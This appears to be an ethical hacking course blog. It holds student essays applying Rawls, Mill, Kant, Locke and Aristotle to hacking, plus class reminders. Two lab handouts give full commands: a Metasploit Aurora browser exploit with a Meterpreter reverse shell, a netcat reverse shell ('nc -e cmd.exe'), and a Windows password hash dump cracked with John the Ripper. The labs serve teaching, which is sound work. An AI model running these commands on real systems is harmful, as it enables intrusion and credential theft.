Hackers and Moral Desert (not a sweet treat)

The concept of moral desert is a complicated one. Moral Desert states that a person is obligated to something because of something else (the dog gets a biscuit because he's been good), and that result can be either good or bad; the person must accept all consequences be they positive or negative. The actual theory is more complex and the Stanford Encyclopedia of Philosophy gives a much more in-depth explanation (trying to explain it fully here would go way over the maximum word count, so I'll just mention the site).

This theory was famously rejected by the philosopher John Rawls. Rawls claimed that a person's talents were simply the result of 'natural lottery' and so a given individual could not claim credit for and does not morally deserve the results of said talents (better job/salary, award, etc); he does clarify that while he does not accept the underlying concept of moral desert, people can and should expect to receive positive--and only positive-benefits from talent (he calls this 'Legitimate Expectation'). Where the legitimate expectation argument seems to fail is that it states that one only deserves to take credit for results if the individual or group expected them to happen, and the only results that count are positive.

In applying this concept to hacking, a person may not expect the results of an action but it happens anyway. Is it then moral to claim credit for those results? According to the basic moral desert framework, yes. In today's world where exploits can be found with a Google search and skill isn't necessarily required to make use of some powerful tools, not unless the person personalized the results in some way (tweaking source code and adding in a signature, adding a message to a defaced site, etc) so that everyone would know it was them. Hacking results are only claimed by an individual or group if the results are positive (when was the last time you heard of Anon, LulzSec or the like taking credit for a failure?).

When I was in high school, the 'IT department' (one librarian who believed anything on a computer worked exactly the way it was supposed to) used a fairly simple keyword filter with a bad bit of code. It blocked sites based on keywords with no context, resulting in students unable to do research assignments because the filter was blocking a lot of stuff it shouldn't.

I was able to get the password through simple shoulder-surfing (I was just curious and did not expect to be able to actually get the master password). So I disabled the filter when I had an in-class project that otherwise would have been impossible. One teacher saw me doing this and assumed IT had trusted me with the password; I later told her that was not the case. She asked how I got it; I told her, gave her the password, she gave it to a couple other teachers and students were happy. Everyone behaved (the students didn't directly have the password, only teachers) and there were no logs to check. This fails the 'legitimate expectation' argument that Rawls gives, as I used knowledge (not 'natural lottery') to gain these results, but I had no real expectation of being able to circumvent the filter. Nor did I expect or even want credit; I figured that the librarians would probably find some reason to ban me from the computer lab altogether if they found out.

Another possible example of the moral desert theory is the Harvard admissions hack. Prospective students replaced a character string in a URL, and thus were able to view their admissions status in advance. Could it be considered an 'immoral' advantage? Not knowing the whole story, I would think that it depends. If an applicant viewed only their own information while waiting for the letter to arrive in the mail, I would not see that as an unfair advantage as the outcome was already certain. Some might.

You could argue that the person who discovered this flaw in the system did not expect to gain access (the expectation is that databases like that with sensitive information are protected by a password or other barrier to entry from the outside), but we don't know if that is in fact the case. Once the info was published, everyone expected to get in, so that might fall under 'legitimate expectation' (however wrong it may be). However, anyone using the hack must be prepared for the negative consequences as well as the possible positives (moral desert).

John Stuart Mill and Jeremy Bentham - Enjoy the occasional hack.

What would John Stuart Mill and Jeremy Benetham say about hacking?

An interesting idea, and certainly one worth taking a look at. For this blog post, I am focusing on two of the strongest driving forces behind the ideas of Utilitarianism. Utilitarianism is the idea that the proper action, the moral action, is the one that maximizes overall happiness. Benetham states that there are two “soverign masters” governing mankind, pain and pleasure, and Benetham believes that the proper action would be one that maximizes overall pleasure, while minimizes overall pain. This concept stems from the idea of consequentialism, which states that the morality of an action can be determined only from the outcome of said action. This differs from Kant’s idea of categorical imperative, which can be summed up by saying that some actions, regardless of outcome, are moral or immoral. To really get an idea of these concepts in action, let me employ a lovely example I came across in one of Michael Sandel’s lectures.

Imagine you’re walking along a bridge and you spot a runaway train; It’s zooming along the track, the breaks don’t work, and Denzel Washington is nowhere to be found(If you don’t understand the joke, don’t be discouraged. I assure you it wasn’t that funny anyway). A good distance down the track are five unaware train workers, doing train worker things to the track. Imagine that it is inevitable - if nothing is done, these five train workers are going to die miserable, painful deaths. Now, imagine on that very bridge, a incredibly large man is leaning over the railing directly above the train’s track. You realize that you can save all five of those train workers lives if you just push the large man over the railing, and onto the track. This incredibly large man would inevitably die a most unfortunate death, but in the process he will have saved five other peoples lives. So what do you do - Do you choose send one man to his death to save five people, or do you choose to let the train kill the five workers and let the fat man lean against the railing in peace?

The utilitarianist would keep it simple and state that five lives without pain and one life with pain is better than five lives with pain and one without pain, and without much hesitation, send the fat man plummeting to his inevitable end. Obviously, somebody who follows Kant’s idea of categorical imperative would let the five men die, because regardless of whether 5 men die or 1 man dies, this philosophy states that sending a man to his death is, without question, immoral, and thus the wrong decision.

So now that we know how the Benetham and Stuart Mill would act in that scenario, what can be assume about their stances on hacking? I believe that both of these gentlemen would support hacking as long as it follows the basic tenants of utilitarianism -- there must be more overall happiness after the hacking than before. Let’s delve into a few scenarios and see the stances they’d take.

Would Benetham/StuartMills be okay with hacking into somebody’s wireless network? It depends - if the hacker isn’t in any way infringing on the owner’s speeds, or data privacy, I don’t think they would have a problem with this. Pleasure is gained from free Internet, and if the owner’s experience does not change post-hack, he/she does not feel any pain. If you take a step further, it might be argued that the people who profit from the Internet service provider’s income may suffer, so depending on how much the ISP stands to lose from this hack, Benetham and co. might not approve of the hack.

Would Benetham and co. approve of hacking a child pornography website? Absolutely. Without a doubt these people would view distributors and producers of child pornography and incredible sources of pain for children and families, and to prevent them from creating any more pain, thus minimizing pain and increasing overall happiness, they would hack the website (Stuart Mill has 1337 h@ck3R sk1llz, afterall).

And for my final example, would BeneMills approve of hacking Microcenter’s website because he doesn’t like their prices and the manager was a big jerk to him? I believe they would not - they would see that while it may produce a considerable (very, very, very considerable) amount of pleasure for the hacker, it would cause much more pain for customers, workers, and anybody who stands to profit from the website’s operation.

In conclusion, I believe that our friends Benetham and Stuart Mills would approve of hacking - but only after they have analyzed the resulting outcome of said hacks.

Oops!

In my half-awake stupor I forgot to thank both Jamie and Monica for taking us out to lunch. It was awesome and much appreciated. So thank you guys, and thanks for making the class enjoyable and engaging!

John Rawls is Anonymous

John Rawls believed that the greatness your future may or not behold stems solely from the things you were taught and the talents you were given at birth, and as a child. John Rawls philosophy is that even with meritocracy you will never be put ahead of someone who is naturally talented. You were either born into a family that raised you to be successful or you were not. However, John Rawls mentions that even those who are naturally talented can not claim credit because there success may rely on factors such as birth order.

John Rawls also thought that being paid insane amounts of money to do something you were born talented at is unfair. Unless you were using some of that money to give back to the people who lack talent in such things. For instance in the lecture they mentioned the salary of supreme court judge Sandra Day O’Connor ($200,000) with the salary of television’s Judge Judy ($25 million). To no surprise, John Rawls would not approve of the pay difference. When I heard John Rawls's take on Greed an wealth of the talented people, It made me think about what his opinion would be toward the current actions of anonymous. I wonder if he were still alive, if he would reject the protesting or support it. Based off what I learned from the lecture, I think John Rawls would want to take part in the protesting and would support the occupy groups. John Rawls was most likely ashamed by present day America with all the overpaid athletes and bone head celebrities. Although, in many instances his theories prove correct. The rich are richer and the poor are getting poorer.

However, I believe that groups such as Anonymous would give John Rawls hope, and maybe even put his theories to the test. Anonymous is a public group of secret members, who claim to be activists for freedom and truth. They claim to be ideas without origin. It started with image board in japan. Then they created an image board in English (4chan).Where Anonymous only grew in numbers. Annonymous as I mentioned is public and completely diverse. Holding member of various skill sets, though some are childlike and immature, there are also educated and skilled members. Anonymous has been know for actions such as stealing private information, and taking down inappropriate websites for justice. I don't fully agree with the idea that hard work will never compare to natural talent. Also, the idea that people who come from impoverished families should be given charity by wealthy families. In most cases that theory may hold truth, but not all. I think John Rawls needed to put more faith in the underdog.

I personally think John Rawls would be proud of the current cover of Time magazine.(Person of the year: The Protester) I feel John Rawls almost thought of life as a race, It all depends on where you start that determines the outcome of how far you will go. That's why I believe he would be proud of the “underdogs” for fighting against the greed and ridiculous wealth that belong to a select few. John Rawls seemed like he was all about the idea that the talented and wealthy can have tons of money, as long as they help the less fortunate. Many wealthy American do give back to the community by giving to charities, but there are also many wealthy people who could care less. I am not sure how John Rawls would feel about all the hacking anonymous does.

In conclusion, John Rawls believed that the success in your life is determined by your beginning and that no matter how hard you work the person with the “easier” beginning, or farther start will end up ahead of you. Which I do not believe. Also, John Rawls believed that natural talent was more efficient than motivation and effort. John Rawls also believed that the wealthy should have to give some of their money to the less fortunate, because they can not take credit for their natural talent. I mentioned that I personally believed John Rawls would find anonymous and the occupy groups intriguing, because they are joining together to fix what they see as wrong in the world.

Aristotle and Anonymous

The hacker ethic is closely related to the virtue ethics found in the writings of Aristotle. Aristotle’s Nicomachean Ethics suggests there is an ultimate good toward which, in the end, all human actions ultimately aim. Virtue Ethics refers to the philosophy that emphasizes being, rather than doing. This means that morality stems from the how a person identifies his/her motivations for the action, and the character inherent in that person, and not from actions of that person alone. Ethical choices and examination must be made in each individual situation, based on factors such as personal vs social(group) benefit, and what intentions are present in the person(s) …are they well meant or malevolent?. Anonymous is a complex example to examine because by it’s very nature, it consists of a group of persons of unknown identity, who, despite claiming altruistic intention, may in truth be carrying out actions that benefit a smaller chosen group, although they claim to seek justice for others…or they may be as they seem. In truth, that may fluctuate at every moment, as it is a “many” and not a “one”.

Anonymous was formed on the imageboard 4chan, primarily a place to chat and post images and rambling text (often incoherent or offensive…at this point I’d like to shout out to the /b/tards!). They act at times like a hive mind with no openly recognized leaders, choosing to encourage and inspire group action under an anonymous fictional figurehead (as shown by their logo, a suited figure without a head, instead there is only a question mark, standing in a stance of authority in front of a globe). Starting somewhere around 2006, members of this collective have collaborated through anonymous Internet Relay Chat (IRC), where they communicate in group chats, send each other private messages. There is also the capability to exchange files via FTP/file transfers via IRC. IRC creates a decentralized “war room” in which ideas are exchanged, agreements are made as a group, and plans may be deployed. Actions that follow include DDoD attacks , the public posting of group information mining efforts, exposing as muany details as possible to the public eye about offending groups, people or corporations, including security flaws and exploits of websites that may be used by any and all, to create further breaches and attacks. The factor of anonymity and the group collective effort of many (“We are Legion”, they proclaim), can have strong influence on certain social groups in today’s society.

The idea that Anonymous represents is ethical. They represent a symbolic figurehead, an inspiration and identification symbol by which to organize actions with intent towards acts of activism via hacking, or “hackivism”. Individuals within the whole collective operates in a non-centralized, collective manner that insists on overall agreement in order for such action to succeed despite any petty differences or disagreements, with members working together in order to accomplish set goals. In addition, they put out the call for others to join, adding further strength in numbers. But the question is - is crashing a website, or denying people access to the information or function of it, a morally justified means of protest? Is putting the personal information of a person who has committed a perceived wrong out there helpful? I bring up the case of the “pepper spray cop”, John Pike…are the efforts of publishing his information, that result in lots of pizza, male escorts and such being sent to his home, that he shares with a family who are not at fault, worth it as a form of protest? Is it worth it if only to shame HIS unethical behavior, and do we consider the demoralizing effect this may have on innocent members of his family? In John Pike’s case alone, Aristotle would argue for Distributive Justice…in essence, that people should get what they deserve. In Pikes case, it could be argued that he “deserves” less respect, authority, and dignity or pride. Certainly it can be said, that despite the resulting actions being petty, that they strip away his dignity and lower the reflection upon him of those traits I have just mentioned. When considering this protest, or any other, the moral reasoning of the protest should be examined. If that action is deemed to NOT fit in the reasoning, and instead commits a wrong to the target by way of the action, then that act of protest should seem morally wrong. Aristotle’s virtue ethical theory only focuses only upon the agent of the chosen action. The actions of a single individual in such an act of protest, compared to the relative morality of the rest of the world, may not be considered ethical, but the scale of justice shifts when it is a mass, faceless collective. It becomes easy to understand them as the Everyman. This gains sympathy – who doesn’t want to see a “bad guy” come to his just desserts, after all?

Ethics Blog Post (Exactly 800 Words)

John Locke (even though I disagree with John Locke on many
issues I agree with natural rights) was a 17th century Philosophy
that influenced many other social thinkers, political philosophers, economic
theories from all walks of the spectrum. His theory’s can be applied to a
concept that he wouldn’t be so far from, property rights in the modern era.

Property rights in the modern age seem to be dwindling, and
no I’m not talking “Me Hate Taxes, Taxes Bad GRR”, I’m talking with modern day
electronic devices and digital content where the concept of ownership seems to
becoming less than that of the Native Americans. Where and when will people
finally see that when you buy an electronic device where you can only do
certain things with it “or else” that you don’t really own a product, you are
merely leasing it? It’ll probably be where you can’t just smash the device with
a shovel for being an ineffective piece of shit without having the manufacture
suing you for improper use. EULA’s are turning purchases into leases,
destroying property rights.

Take the Sony case, for an example, where a jail breaking (modifying)
a Playstation and telling people how to do it could bring on a lawsuit. This
brought an outrage in me that if I rented a car and caused damaged to it or
modified it against their wishes, the rent-a-car company could bring a lawsuit
against me and would be completely just in doing so. But if I bought a car and
modified it the car salesman or even the car manufacture could not sue me. John
Locke claimed before and would claim today that a civil society was created for
the protection of property. Property what is one’s own. That even in the sense
of the law (as in if someone broke into my house they would be stealing my PS3,
not Sony’s PS3) I would own that Playstation but I could not modify it; even
without causing real harm to others, that I could be punished for my actions.

Yes, companies deserve say in what you do with your product
ON THEIR systems, just like the state has a say in what you can drive on public
roads, and a store has a say in what they will sell. Sony could ban any user
that jailbreaks their PS3 from the Playstation network without anyone’s
property rights truly being infringed upon. This all falls under natural rights;
John Locke could comparatively see this action to another action in his time
such as a traded horse with a contract to the new owner that as long as the new
owner does not needlessly beat the horse he could ride the horse on trader’s
property, but if the new owner needlessly beats his horse he no longer can ride
his horse on the trader’s property.

Digital content isn’t owned, it is rented with a onetime fee.
And I’m not talking about copyrights; people deserve credit and payment for
their work, I’m talking purchased digital content where your ownership be
revoked for as simple a reason as they sold it to you for a couple dollars less
than they should have. Yes, I am referring to the Kindle books that were deleted
from people’s Kindle’s by Amazon (Ironically it happened to books by George
Orwell, Animal Farm and 1984, among others) after they had already paid for the
book. This wouldn’t happen in John Locke’s time and comparatively John Locke
would see this as a giant abridgment of property rights, ones labor exchanged for
value, and that value traded for goods then become one’s property.

Imagine a scene like this occurring in John Locke’s time,
John Locke purchases a book for 10 shillings, he reads it, enjoys it and when
he is halfway through the man that sold him the book runs up to him, takes the
book right out of his hands and gives back the 10 shillings (for one of many
various reasons sold too cheaply, wasn’t an authorized version etc.) which went
completely outside of the agreement the men had (Amazon’s ToS). With the
government sitting idly, by just allowing this to occur wouldn’t truly be an
ideal society or a Civil Society.

Property in the digital age is truly becoming a dying concept;
the day will come where true ownership of electronic devices and of property on
digital devices becomes a thing of the past, where you do not own an object,
you just paid a onetime fee to be allowed to use it. That is the future we face
unless we extend current property rights protections to digital content and
electronic devices.

OOOO Nooooooo, I am currently not at exactly eight hundred words;
I now only have two more words to write right now.

Screw Flanders.

Thursday 12/15!

Meet at Chow Thai Cafe at 2:00 PM! Yes, 2:00! If you can't come until 2:30, fiiiiine, we'll start having fun without you.

Make sure you make your final ethics blog post by 11:59 on Thursday. This is more than half of your ethics grade for the course; as a result this is more than 1/6 of your TOTAL final grade for the course. SO DO THE %$#%(% PROJECT!

Last Call....

It is officially the LAST week of classes, and as such I am reminding you that ANY homework assignments you might have missed that are "past due" you should submit by this Thursday, December 15 to recieve any credit. 

Project 10 we completed in class last week, so if you were in class, you got credit for it.  If you missed that class, you will need to complete it on your own and send me a screenshot to receive credit. 

Project 11 builds on 10 and is due on Thursday!

Reminder: The test on Chapters 11, 12, and 13 will be tomorrow in class!

Ethics blog

Philosopher Immanuel Kant introduced some interesting characteristics of freedom, necessity, justice and right. The word freedom is a powerful word revolving around free will and choice. Necessity can be based on an act performed in order to prevent a greater evil or harm. What about the Justice in an act that constitutes fairness and is there a moral right revolving in such an act?

My ethical hacking term will be based on two computer worm viruses, Stuxnet and Suter. We all know that malicious viruses can create havoc on computer systems by stealing our data, corrupting our software and just causing a big friggin headache! But what if a virus such as Stuxnet and Suter can be used for ethical purposes? A good example would be launching one of these viruses against so called “rogue nations” who are seeking to build nuclear weapons for their evil intentions.

In September of 2007, Israel launched an air strike in Syria that demolished a suspected nuclear plant. Israeli fighter jets were able to cross into Syria undetected due to a virus called Suter, executed by Israel which immobilized Syrian radar defenses. A few years later sometime around November of 2010, Stuxnet was launched against Iran. This virus was used against the Iranian's Natanz nuclear facility plant, which destroyed at least one thousand of their centrifuges. Stuxnet was not only successful in disrupting Iran's nuclear power plant, but this attack is said to also delay Iran's capability in building a nuclear weapon.

So there’s no question a malicious virus that we once thought to be a threat against our computerized systems, may one day become a savior in dismantling a hostile nation's network and there by disrupting their nuclear weapons plant.

Now we come to the question on whether or not Stuxnet and Suter were morally right from an ethics point of few. What gives an act its moral worth? Does moral worth of an action depend on a motive as in doing the right thing for the right reasons? Was there any justice in sabotaging another country’s computer network? Does the word necessity come into play with a distinct argument that suggests that these viruses were necessary in order to prevent future evil that may one day create unimaginable harm?

We certainly can not predict the future and some will argue that mere assumptions may not be so valid to constitute such a right to deliver a virus attack against other countries. But is it best to be safe than sorry? Do we sit back and wait to see Iran’s true intentions of nuclear capability? If so, will we regret later on by not taking the necessary form of action to prevent their use of nuclear weapons? Is it morally right in creating viruses for the purpose of good when we have always dubbed viruses as malicious code? I guess it all depends on the situation.

Take for example an unethical incident in the country of Estonia, in 2007 that country was literally shut down by an unknown virus code. The virus took down the country's government web sites, banks and other financial firms. This attack is speculated to originate from Russia after a controversial debate on relocating a Soviet era monument within Estonia. Was this virus morally and ethically right over a statue? If so, I see no justice to shut down a peaceful country who wanted to forget the darkness of communism that once reined on its sovereignty. Perhaps our comrades had too much vodka and took it overboard?

Regardless, it is possible that malicious code may very well become helpful in dealing with future 21^st century technological threats. The creation of such a virus in my opinion certainly has an ironic twist to it and we need to analyze that from certain perspectives. The use of such a virus may now have some good intentions towards preventing something drastic in the near future. One may call it a necessity.

I believe we will witness an extraordinary event involving a virus, which will help save millions or perhaps billions of lives around the world. When it comes to the word virus, we immediately think of a malicious code with potential destruction. But what we really should be asking ourselves is, is it morally and ethically right to launch a virus for good intentions and if so, will it have a moral worth to it? Again, will that moral worth of an act have some kind of motive towards doing the right thing and for the right reasons in hopes of preventing a greater harm from rogue nations? Only time will tell, great philosopher Immanuel Kant once said “So act that your principle of action might safely be made a law for the whole world.”

Scams

There's a show on History Channel (HD feed; not sure if it's also on the standard version) right now about assorted scams, how they play out and how/why people fall for them.

Give this one a try.

Want to work for British intelligence? All you have to do is crack the code.

http://canyoucrackit.co.uk/index.asp

Scammers work around two-factor authentication

http://slashdot.org/story/11/12/06/0321250/scammers-work-around-two-factor-authentication-with-social-engineering

Not all that surprising, given how lax some people can be with internet securification...

Chapter assignments!

Don't forget: you're asked to present on one of the chapters on Thursday!

Here is the list of who will present on which chapter:

Chapter 11: Rob, Karl, Joe

Chapter 12: Marie, Isabel, Sean

Chapter 13: Orlando, Vinny, Corey

sodqv

Phhw dw fkrz wkdl fdih iru oxqfk rq ghf 48.

Overheard in Ethical Hacking

"The smiley face is an L."

L, for I effing Love this class. Thanks for letting me play and learn with you real computer people this semester.

of interest, and a damn good read

Cryptonomicon by Neal Stephenson

One of my favorite authors, and a great book. Also, related to the topic!

Project 11 - Setting Up a Reverse Shell, Dumping Passwords, and Cracking Passwords

 Using Netcat to Set Up a Reverse Shell

Exercise 1: using Netcat for a reverse shell: in the following exercise, you will use the Meterpreter payload from the previous lab to set up a Netcat listener (AKA reverse shell). This will allow you to remotely control the target system after you close your Meterpreter session and thus, come back to the target system whenever you want:
1. The first step in setting up a Netcat listener is to get the Netcat executable on the target system so it can be used to interact with your attack system. There are a number of ways this can be accomplished. You’ll use Trivial File Transfer Protocol (TFTP) to copy the Netcat executable from your BackTrack system to the target system

2. In the bottom left of your BackTrack desktop, click the dragon-looking icon/Services/TFTPD/Start TFTPD. This will start the TFTP daemon (or server service) on your BackTrack system. You should get a message that the TFTPD is running on port 69 and the home directory is /tmp. Click the OK button

3. You are now going to copy the Netcat executable from its default location (/pentest/windows_binaries/tools) to the /tmp directory on your BackTrack system so it can be TFTPed down from the target system. To do so, open a new shell (leave the current Meterpreter shell open) and type the following (only type what’s in bold):
user1@pentest:~#cp /pentest/windows-binaries/tools/nc.exe /tmp

4. Change into the /tmp directory and list the contents of this directory (only type what’s in bold):
user1@pentest:~#cd /tmp
user1@pentest:~#ls -al
Look for the nc.exe file in this directory

5. Leave this shell open

6. Go to the Meterpreter shell you left open. At the Windows command shell prompt, type the following (only type what’s in bold):
C:\WINDOWS\system32>tftp -i BackTrack_IP_address get nc.exe
Syntax breakdown:
tftp: program name
-i: specifies the binary image transfer mode (which means to move the binary file byte by byte)
BackTrack_IP_address: IP address of your BackTrack system
get nc.exe: transfers the nc.exe file from your BackTrack system to the target system
If the file transfer was successful, you should see a message similar to this: “Transfer successful: 59392 bytes in 1 second, 59392 bytes/s”

7. Now you will set up both the client and server portions of the backdoor

8. In the second shell you opened in step #3 (not the Meterpreter shell), start the Netcat program on your BackTrack system in listening mode (server mode) by typing the following (only type what’s in bold):
user1@pentest:~#nc -v -l -p 3333
Syntax breakdown:
nc: program name
-v: verbose mode
-l: listen mode (listen for inbound connections)
-p 3333: local listening port on the BackTrack system

9. From the Meterpreter shell (where you have the Windows command shell prompt open on the target system), start the client side of the Netcat backdoor (only type what’s in bold, on one line):
C:\WINDOWS\system32>nc -e cmd.exe BackTrack_IP_address 3333
Syntax breakdown:
nc: program name
-e cmd.exe: inbound program to execute
BackTrack_IP_address 3333: your BackTrack system’s IP address and listening port for incoming connections
This will shovel a Windows command shell from the target system to your BackTrack system, appearing in the non-Meterpreter shell you opened in step #3

10. Close the Meterpreter shell window (click the X in the upper-right corner of the window)

11. Notice your BackTrack prompt has turned into a Windows command shell prompt. You now have a backdoor into the target system

12. Type (only type what’s in bold):
C:\WINDOWS\system32>dir nc.exe

13. Leave your Netcat listener shell open

Exercise 2: Using Meterpreter to Dump Windows Password Hashes
 Using Meterpreter to Dump Windows Password Hashes: in the following exercise, you will use the built-in capability of the Meterpreter payload to dump the password hashes of the accounts on your target system. These hashes will be used later in password cracking attempts, with the ultimate goal of getting additional usernames and passwords:

1. Close your reverse shell and return to the Meterpreter prompt (only type what’s in bold):
C:\WINDOWS\system32>exit

2. With a Meterpreter shell in place type (only type what’s in bold):
meterpreter > hashdump

3. The contents of the target system’s password hash file are output to the screen.
The passwd file contains user account information and looks as follows:
Administrator:500:CEEB0FA9F240C200417EAF40CFAC29C3:D280553F0103F2E643406517296E7582:::
User1:1011:7584248B8D2C9F9EAAD3B435B51404EE:186CB09181E2C2ECAAC768C47C729904:::
User2:1012:AC5BA6A944526699AAD3B435B51404EE:F07A9DFFFC2C5C7F9D9EBC83FD69D68E:::
User3:1013:E7EED3F5C2C85B88AAD3B435B51404EE:6AA15B3D14492D3FA4AA7C5E9CDC0E6A:::
Each field is separated with colon. The fields are:
 1st field: username (Administrator, User1, etc.)
 2nd field: Relative Identification (RID): last 3-4 digits of the Security Identifier (SID), which are unique to each user
 3rd field: LM hash
 4th field: NTLM hash

4. Based on previous lab techniques, determine a way to get the contents of the hashdump output from your BackTrack system to your Windows attack system

5. Save the file as hashes.txt to the c:\temp drive on your Windows attack system

Exercise 3: Cracking Windows Password Hashes Using John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of *NIX, DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak passwords. In the rest of this lab, John the Ripper will be referred to as John.  In the following exercise, you will use the command-line version of John to crack the LM password hashes from your target system:

1. Get the password hashes from your target system to your BackTrack system, saving them in /root/ceh, in a file called hashes.txt

2. Change into the directory where John is located (only type what’s in bold):
user1@pentest:~#cd /pentest/passwords/jtr
user1@pentest:~#pwd
/pentest/passwords/jtr

3. Type (only type what’s in bold):
user1@pentest:~#./john /root/ceh/hashes.txt
Syntax breakdown:
./john: program name
/root/ceh/hashes.txt: the password hashes from your target system
Your output will look something like this:
Loaded x password hashes with no different salts (NT LM DES [32/32 BS])
PACHYDE (smendez?e?:1)
RM (smendez?e?:2)
guesses: x time: 0:00:08:23 100% c/s: 9204K trying: ZYUUZOK - ZZZZZZZ

4. In a second BackTrack shell, use the --show option to display the password cracking status (only type what’s in bold):
user1@pentest:~#./john --show /root/ceh/hashes.txt | less

NOTE: you will need to re-run this command multiple times to get the latest information relating to cracked passwords and remaining hashes left to crack

Project 10 - Browser Exploit Using Metasploit

In the following exercise, you will use Metasploit from the BackTrack distribution to deliver an exploit to a vulnerable version of Internet Explorer:

1. From a BackTrack shell, navigate to the Metasploit Framework 3 folder (only type what’s in bold):
user1@pentest:~# cd /pentest/exploits/framework3
user1@pentest:~# pwd
/pentest/exploits/framework3

2. Open the Metasploit Framework console (only type what’s in bold):
user1@pentest:~# ./msfconsole

3. You are now going to setup Metasploit to use the Aurora exploit, made famous in December, 2009, when Chinese hackers launched this malware (and a host of others) against Google and 35 other multinational companies (only type what’s in bold):
msf > use windows/browser/ms10_002_aurora

4. Set the IP address of your BackTrack system, which will run a web server hosting the exploit (only type what’s in bold):
msf exploit (ms10_002_aurora) > set SRVHOST BackTrack_IP_Address
SRVHOST => BackTrack IP Address

5. Next, set the Meterpreter payload to launch a reverse shell once the victim visits the web server being hosted on your BackTrack system (only type what’s in bold, on one line):
msf exploit (ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

6. Set the following option for the Meterpreter payload (only type what’s in bold):
msf exploit (ms10_002_aurora) > set LHOST BackTrack_IP_Address
LHOST => BackTrack IP Address

7. You are now ready to launch the exploit (only type what’s in bold):
msf exploit (ms10_002_aurora) > exploit

Your output should look as follows:
[*] Exploit running as background job.
[*] Started reverse handler on BackTrack_IP_Address:4444
[*] Using URL: http://BackTrack_IP_Address:8080/text_string - select and copy the URL being outputted here
[*] Server started.
msf exploit (ms10_002_aurora) >

8. Leave this shell open - you will return to it shortly

9. Log into your Victim Windows system

10. Open Internet Explorer

11. Paste the URL from step #7 into the address bar and hit ENTER

12. Switch back to your BackTrack system
You should see the following output:
[*] Sending Internet Explorer “Aurora” Memory Corruption to client Windows_Victim_IP_Address
[*] Sending stage (749056 bytes) to Windows_Victim_IP_Address
[*] Meterpreter session 1 opened (BackTrack_IP_Address:4444 -> Windows_Victim_IP_Address:Port #) at
Day, Date Time
Note: you need to hit ENTER to get your Metasploit shell back

13. Type the following (only type what’s in bold):
msf exploit (ms10_002_aurora) > sessions -i x (where x is the Channel number in the output in step #12)
[*] Starting interaction with 1…
meterpreter >

14. Open a Windows command shell through the Meterpreter shell

Chapters 11, 12, 13 Homework

Chapter 11 - Activities 11.1 - 11.3
Chapter 12 - Activities 12.2, 12.4, 12.5
Chapter 13 -  Activities 13.1 - 13.3

Screen shots for these are due next Thursday, December 8.

A story about frequency recognition code breaking

The Gold Bug, by Edgar Allan Poe

Final ethics blog post! (Due 12/15)

Please create a NEW POST on the blog of 700-800 words *PRECISELY*. Not longer, not shorter. Make it engaging, analytically sophisticated, and concise.

In your post, you will apply the skills of ethical analysis you've learned to create a piece of writing that contributes to the internet discourse on the ethics of hacking. You are writing for a real audience, and you are contributing to a 21st century debate that is dearly in need of attention from smart peoples who are skilled in thinking about both hacking and philosophy.

Choose one of the episodes by Michael Sandel on http://www.justiceharvard.org/watch/ I don't recommend the first or last ones; any of the others could work well.

Watch the lecture. :)

Think about the lecture. Generally, Sandel will introduce a political or moral philosopher, like Aristotle, Kant, Rawls, or Locke, and apply the philosopher's ideas to situations.

Those situations will generally not have anything to do with computers. This is a shortcoming in our 21st century world.

You can ameliorate this problem. Apply the ideas in the lecture of your choice--ideas like utilitarianism, rights, moral desert, loyalty, etc.--to a problem or case of your choice in computer hacking. What would John Stuart Mill say about wardriving? What would John Rawls say about jailbreaking? What would John Locke say about replacing the characters in a URL and seeing what you get? What would Immanuel Kant (look, he's not named John!) say about doing that thing where you use web forms to SQLeeze your way into databases?

Don't forget to briefly introduce your philosopher and your hacking idea before you connect them. Readers will happen upon your post via Google, so you want to give them a bit of an introduction so they're not flying bling.

Make sure your ideas are analytically sophisticated--that would go without saying. But ideas are only part of the battle. Don't forget to express your ideas in an attractive and engaging and concise way. Wit, humor, beautiful writing--all these are great ways to engage your readers. Think about your favorite serious bloggers or op-ed--that's the sort of tone you want.

Codebreaking

Find out about codemaking, codebreaking.

Cryptography.

Frequency analysis.

Cipher texts.

Caesarean shifts.

Enigma.

These are words that matter for codebreaking.

Break the codes.

http://www.onlinegamingzone.com/codebreaking.html

Copywrong?

Y'all are hacker-types.

And while hacker-types and pirate-types are definitely not coterminous categories, piracy and hacking are closely connected. The Observant Commuter drew our attention to this several posts back.

Which brings us to the question of copyright.

Books, music, movies, software, drugs--all these can be and are copyrighted.

Does copyright undermine or increase creativity? Does pirated software infringe on property rights? And if so, how so? Does the blame lie with the person who uploaded a file to a torrent site, the person who downloads and benefits from it, or both--and why? Is copyright defensible in theory, but is the 21st century way of doing copyright a step too far? What do you think? Please create a comment on this post, no later than 12/6 at 1:00 PM (AKA Captain Seafoam Green's breakfast hour).


Some things to think with:


A theoretically-sophisticated argument that copyright is not justifiable in its current form:


http://www.tomgpalmer.com/wp-content/uploads/papers/morallyjustified.pdf


Two simpler perspectives on intellectual property:


http://www.stephankinsella.com/wp-content/uploads/publications/InsightMag_com_symp_printable.htm


About piratebay


http://en.wikipedia.org/wiki/The_Pirate_Bay

A movie (one hour long)

Steal This Film

Uplink--hacking simulation game

I haven't played it yet, but downloaded it this morning as part of the newest Humble Indie Bundle (set your own price for a pack of independent games that are completely DRM-free)

http://www.introversion.co.uk/uplink/

Tag

Oooo tie a paisley ribbon on the Dark man's car,
It's been one long game and I keep picking on his car...

Luvs ya,
Ms.M

Movie Night

Ok so I'm a dope.
For those coming to movie night please change the 6 on the invitation to a 16.
Hope to see you all there,
Corey

IMPORTANT REMINDERS!!!

The Chapters 7, 8, 9 and 10 test will be tomorrow (Tuesday, Novem,ber 22) in class.  The test will be based on the content compiled from the presentations given on Thursday.  It will include a hands on component using the virtual environment that will be based on something you had to complete for homework from the chapters.

Also, Project 9 and Chapters 7, 8, 9 and 10 homework is also due tomorrow (Tuesday, November 22).  Chapters 7, 8 and 10 are technical screenshots, while Chapter 9 is research based screenshots.

The class immediately following Thanksgiving break, Tuesday, November 29 there will be no class due to Professional Development Day for faculty.  We will resume for our final less three weeks on Thursday, December 1.

http://www.youtube.com/watch?NR=1&v=YiBMLp2Ows8

Did you enjoy the Tooth rotting Candy

I hope you enjoyed the free candy, Jolly Ranchers are irresistible. It contained a new formula developed by a secretive group of dentists.

Social Engineering done, get Tooth rotters into the class room and get the majority of people to have at least one.

Stop Online Piracy Act....could Stop Online Participation

